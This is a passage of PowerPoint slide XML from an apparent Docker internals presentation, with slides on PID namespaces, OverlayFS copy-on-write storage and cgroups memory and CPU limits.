            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> run -it --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=host alpine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> aux </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2932821" y="2419294"/>
            <a:ext cx="6526905" cy="3906896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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26248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pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748422" y="168259"/>
            <a:ext cx="10515600" cy="1137442"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Storage - OverlayFS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2405291" y="4826358"/>
            <a:ext cx="1647507" cy="88826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712921" y="5085823"/>
            <a:ext cx="994324" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Image</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4057371" y="5197777"/>
            <a:ext cx="2962592" cy="11876"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="sysDot"/>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flipV="1">
            <a:off x="7019963" y="4054777"/>
            <a:ext cx="0" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>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flipV="1">
            <a:off x="5039869" y="4020487"/>
            <a:ext cx="5956" cy="1177290"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336924" y="1947431"/>
            <a:ext cx="1405890" cy="2013902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6317018" y="1947431"/>
            <a:ext cx="1405890" cy="2013902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC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4336924" y="2651606"/>
            <a:ext cx="1405889" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6317016" y="2685896"/>
            <a:ext cx="1405891" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4360428" y="5270488"/>
            <a:ext cx="7641072" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Mounted as read-only in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>/overlay2/HASH/diff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Configuration is defined in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mtab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2184077" y="2295632"/>
            <a:ext cx="1865745" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Copy On Write</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336924" y="3627176"/>
            <a:ext cx="1405889" cy="3341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6317016" y="3633113"/>
            <a:ext cx="1405889" cy="3341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TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336921" y="3596456"/>
            <a:ext cx="1405892" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>read/write</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6317016" y="3612733"/>
            <a:ext cx="1405892" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>read/write</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>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0686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pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="908542" y="1994870"/>
            <a:ext cx="10577477" cy="1425063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2124037" y="4804928"/>
            <a:ext cx="8146486" cy="1082134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730350" y="3769039"/>
            <a:ext cx="10471050" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Every container creates an overlay2 read-only mount on the host</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748422" y="168259"/>
            <a:ext cx="10515600" cy="1137442"/>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lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Storage - OverlayFS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>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81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pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="1983226"/>
            <a:ext cx="11556004" cy="3962400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Control the resource utilization and keep a limit on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the memory, CPUs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-shares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>flags can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>be used to set a cap on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>memory and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>resource </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>utilization respectively</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> stats --no-stream </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>to verify the above implemented configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>                                               </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748422" y="-38570"/>
            <a:ext cx="10515600" cy="1137442"/>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lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cgroups</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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43302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t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cgroups</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1038541" y="2097088"/>
            <a:ext cx="10841327" cy="3541714"/>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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> run --name unrestricted-mem -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myfirstimage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
